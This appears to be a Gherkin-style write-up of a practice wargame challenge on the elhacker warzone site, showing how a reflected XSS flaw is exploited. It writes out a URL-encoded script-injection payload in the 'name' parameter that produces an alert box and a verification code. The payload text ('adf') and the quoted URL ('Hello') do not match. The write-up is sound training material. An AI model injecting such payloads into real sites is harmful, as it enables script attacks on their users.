## Version 2.0
## language: en

Feature: Hack-Web-Cross-evidence - cryptography - elhacker
  Site:
    http://warzone.elhacker.net/pruebas.php?p=24
  User:
    adrianfcn (Wechall)
  Goal:
    Exploit an XSS vulnerability

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Debian          | buster      |
    | Firefox         | 60.9.0      |
  Machine information:
    Given I have access to "http://warzone.elhacker.net/xss/xyz.php.php"

  Scenario: Success: Showing an alert window
    Given I'm go to the url "http://warzone.elhacker.net/xss/xyz.php.php"
    When I add in the url "?name=%3Cscript%3Ealert(%22adf%22);%3C/"
    """
    http://warzone.elhacker.net/xss/xyz.php.php?name=%3Cscript%3Ealert
(%22Hello%22);%3C/
    """
    Then An alert window emerges with the message "Hello"
    When I close the alert windows
    Then the page will be redirected
    And I get a verification code
